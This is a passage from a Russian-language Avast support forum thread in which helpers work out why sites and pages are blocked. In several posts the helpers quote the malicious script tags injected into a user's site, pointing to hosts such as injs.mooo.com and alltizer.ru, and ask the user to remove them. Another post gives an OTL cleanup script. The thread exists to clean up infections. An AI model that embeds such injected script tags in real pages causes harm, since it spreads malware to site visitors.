201

Здравствуйте, у меня с 9-го числа та же история. мои собственные сайты блокирует. предположил (не без помощи Вашего форума), что вирус. чистил-чистил всеми что тут советуют, всё что нашёл удалил(вирусов в системе не было). сайты так и не стали открываться. на хосте предположили вирус на сайте, откат сделал. НОД и КАСПЕР проблемы не видят. Если ставлю Аваст, Даже скайп не запускается. Выходит владельцы Аваста не могут зайти на сайт? вот сами сайты emo.diplom-kursach.ru и diplom-kursach.ru . Маюсь два дня, мозг кипит, а так как я ещё и нуб в этом всём, то представляете моё состояние :'(? Верните детям его папку! :o

202

petrovitch73, здравствуйте! Добро пожаловать на форум!
Вот результаты сканирования: http://sitecheck.sucuri.net/results/www.diplom-kursach.ru/

у Вас заражена вся страница hххp://www.diplom-kursach.ru//page2.html
удалите:

<p><script type="text/javascript" src="http://adhitzads.com/610012"></script></p>
<script language="JavaScript" src="http://alltizer.ru/js/peeldown.php?id=5604"></script>

Ваш сайт атакует посетителей.

203

А сейчас то что делать? я вот и Аваст ставить боюсь, после стольких лет использования…я скрипт от Яндекс-метрики всунул между тэгами body , это не причина?

204

Соррь, не дочитал совет, это скрипт рекламы, считаете после удаления всех реклам дело пойдёт? исправиться ситуация ?

205

Да, кроме того, удаленный JavaScript был включен внутри поста WordPress (возможно, через инфицирование базы данных). Этот JavaScript-файл используется для распространения вредоносных программ и заражения посетителей сайта.

hххp://injs.mooo.com/13

Вирус, как правило, скрыт внутри базы данных

<script type="text/javascript" src="hххp://injs.mooo.com/13"></script>

результаты по второму сайту такие же,только вирус на 2 страницах: http://sitecheck.sucuri.net/results/emo.diplom-kursach.ru/

206

1.referat… удаляю, html редактирую, ещё какие действия произвести? если не трудно - на пальцах :cry: я сейчас перепишу все страницы(благо их не много), залью на сервер и всё?

207

как перепишете сайт, напишите здесь, если сайт будет чист, то можно будет сообщить в аваст, что сайт чист и удалить его из черного списка.
На сайте удалите hххp://alltizer.ru/files/scripts.js
Antiy-AVL
Trojan/Win32.Agent
NANO-Antivirus
Trojan.Script.Agent.bfhwht

208

Спасибо, работаю. И спасибо за оперативность.

209

в папках со скриптами нет, во всяком случае те что видно.

210

ну я перезалил сайты
вот http://sitecheck.sucuri.net/scanner/ и вот http://sitecheck.sucuri.net/scanner/, с базой пока не разобрался, потому что ещё знакомлюсь с этим зверем :'(, дальше какие действия?

и есть сомнения со страницами .ru/index.html и .ru/ , я на сервер гружу только индекс.штмл, а откуда берётся без index.html? причём скрипты на ней остались…

211

насчет index.html ничего сказать не могу, т.к. я не являюсь веб-мастером
на сайте не нашел больше ничего подозрительного. Сообщите в аваст, что сайт был очищен от вирусов, для этого воспользуйтесь специальной формой: http://www.avast.ru/contact-form.php
Предмет/тема: сообщить о ложной вирусной тревоге на вебсайте

212

Понятно, большущее спасибо!

P.S. А как и где узнать , что я вне подозрений? Сам Аваст не ставлю пока, чтобы не сносить потом, если на сайт не пустит :cry:

213

Ваши сайты уже разблокированы

214

Блин! Не найду кнопочку спасибо! СПАСИБО!!

215

Добрый день.сайт zaz.kiev.ua
пользователи жалуются что avast блокирует сайт.я прогонял через разные сканеры его-все утверждают что он чист.
уберите его из блэклиста,пожалуйста.спасибо.

216

Внимательно прочтите данную тему и пошлите запрос в техническую поддержку (ссылки также есть в этой теме).

217

z006
Вам сюда: http://www.avast.ru/contact-form.php Выберите тему: сообщить о ложной вирусной тревоге на вебсайте.

218

туда я тоже послал.просто по себе знаю,лучше продублировать…

219

Приветствую всех форумчан!
Пользуюсь Авастом около года, все было хорошо, программа очень нравится. Хотелось бы купить Pro версию, но случилась какая-то ерунда. Теперь при попытке зайти на любой сайт вылетает предупреждение о блокировке URL адреса. Причем на сайты пропускает, но показывает какой-то неизвестный мне объект. Есть предположение, что все-таки Аваст пропустил какую-то заразу. Прошу гуру данного форума помочь мне в ее уничтожении. Система Windows 8, в основном пользуюсь браузером Google Ghrome. Файлы логов и скриншот в наличии. Если обращение не по адресу, прошу сильно не пинать и указать куда можно обратиться.

220

biznessiti, здравствуйте! Добро пожаловать на форум!
запустите снова программу OTL by OldTimer . В окно Custom Scans/Fixes скопируйте скрипт:

:OTL
O3:[b]64bit:[/b] - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {09900DE8-1DCA-443F-9243-26FF581438AF} - No CLSID value found.
CHR - Extension: \u041F\u043E\u0438\u0441\u043A Google = C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: \u0421\u043C\u0430\u0439\u043BEx v13.4.5 = C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\eppjoecgeffapapdbnemkenoomhfocdm\13.4.5_0\

:Commands
[purity]
[emptytemp]
[CREATERESTOREPOINT]
[Reboot]
  • Проверьте, что весь текст скрипта был скопирован / вставлен верно и нажмите кнопку “Run Fix”
  • Компьютер перезагрузится.
  • После перезагрузки откройте папку “C:_OTL\MovedFiles”, найдите последний .log файл (лог в формате mmddyyyy_hhmmss.log), откройте и скопируйте текст из него в следующее сообщение.

ВНИМАНИЕ! данный скрипт написан только для этого пользователя,использование его на другом компьютере может привести к неработоспособности ОС!